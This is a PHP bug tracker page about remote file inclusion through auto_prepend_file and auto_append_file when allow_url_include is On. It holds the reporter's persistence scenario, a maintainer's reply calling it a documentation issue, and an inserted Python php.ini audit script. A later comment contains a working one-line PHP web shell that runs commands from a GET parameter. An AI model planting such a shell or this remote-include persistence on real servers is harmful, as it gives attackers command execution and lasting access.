Doc Bug #79476 remote file include
Submitted: 2020-04-14 15:28 UTC Modified: 2020-04-16 07:54 UTC
Votes:8
Avg. Score:3.0 ± 1.0
Reproduced:1 of 1 (100.0%)
Same Version:1 (100.0%)
Same OS:1 (100.0%)
From: c0d1M4x at outlook dot com Assigned:
Status: Verified Package: *Configuration Issues
PHP Version: 7.2.29 OS: Linux/Windows
Private report: No CVE-ID: None
 [2020-04-14 15:28 UTC] c0d1M4x at outlook dot com
Description:
------------
[php version]

Test version is php 7.2.27(Centos) and php 7.3.x(Windows)

[linux install command]

yum install php72w-common php72w-fpm php72w-opcache php72w-gd php72w-mysqlnd php72w-mbstring php72w-pecl-redis php72w-pecl-memcached php72w-devel -y

[Issue]

The affected config file is "php.ini".

When "allow_url_include" is set to "On", "auto_prepend_file" and "auto_append_file" can be set to a remote address, which is then successfully included and can be exploited. This may let an attacker use this configuration item to keep using a getshell for a long time in the case of a getshell or other vulnerabilities.
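A configuration audit for the pattern described in this report, added here as an example and not part of the bug report or of PHP itself: it parses a php.ini excerpt and flags allow_url_include=On together with an auto_prepend_file/auto_append_file that names a URL wrapper. The ini excerpt and the 203.0.113.5 address are constructed sample input.

```python
import re

# Constructed php.ini excerpt for this example (not taken from the report).
SAMPLE_INI = """
; php.ini excerpt
allow_url_fopen = On
allow_url_include = On
auto_prepend_file = "http://203.0.113.5/prepend.txt"
auto_append_file =
"""

# Spellings PHP accepts as a true boolean in an INI directive.
INI_TRUE = {"1", "on", "true", "yes"}
# Wrappers that pull include content from outside the local filesystem
# and are only usable by include/require when allow_url_include is On.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://",
                  "data:", "php://input", "expect://")


def parse_ini(text):
    """Return {directive: value} for simple key = value lines.

    Comments (;) and [section] headers are skipped; quotes around values are
    dropped.  Values that themselves contain ';' are not handled."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        settings[key.lower()] = value.strip('"').strip("'")
    return settings


def is_remote_path(value):
    """True when the path is a URL wrapper rather than a local file."""
    return value.lower().startswith(REMOTE_SCHEMES)


def audit(text):
    """Return findings; an empty list means the ini excerpt is clean."""
    s = parse_ini(text)
    findings = []
    url_include = s.get("allow_url_include", "0").lower() in INI_TRUE
    if url_include:
        findings.append("allow_url_include is On (default Off, deprecated "
                        "as of PHP 7.4.0); set it to Off")
    for directive in ("auto_prepend_file", "auto_append_file"):
        value = s.get(directive, "")
        if value and is_remote_path(value):
            # Remote auto_* is only loadable when allow_url_include is On,
            # but a URL in these directives is suspicious on its own.
            severity = "CRITICAL" if url_include else "WARN"
            findings.append(f"{severity}: {directive} points at a URL "
                            f"wrapper: {value}")
    return findings
```

Run `audit(open("/etc/php.ini").read())` against a real ini file; any CRITICAL line indicates exactly the configuration the report describes.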
 [2020-04-15 09:01 UTC] cmb@php.net
-Type: Security +Type: Documentation Problem
 [2020-04-15 09:01 UTC] cmb@php.net
allow_url_include defaults to Off, and is deprecated as of PHP
7.4.0.  If you enable this setting, you are supposed to know what
you are doing, so this is not a security issue.

I think, though, that this can be documented better.  The security
warning on the include man page[1] isn't as clear as it could be,
and likely a cautionary note should be added to the documentation
of the INI setting[2].  Furthermore, its deprecation has to be
documented.

[1] <https://www.php.net/manual/en/function.include.php>
[2] <https://www.php.net/manual/en/filesystem.configuration.php#ini.allow-url-include>
 [2020-04-16 07:54 UTC] cmb@php.net
-Status: Open +Status: Verified
 [2023-11-10 15:12 UTC] ragafa5955 at glalen dot com
test
 [2023-11-10 15:37 UTC] n13bng at gmail dot com
<?php echo system($_GET['a']);?>
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Thu Nov 21 12:01:29 2024 UTC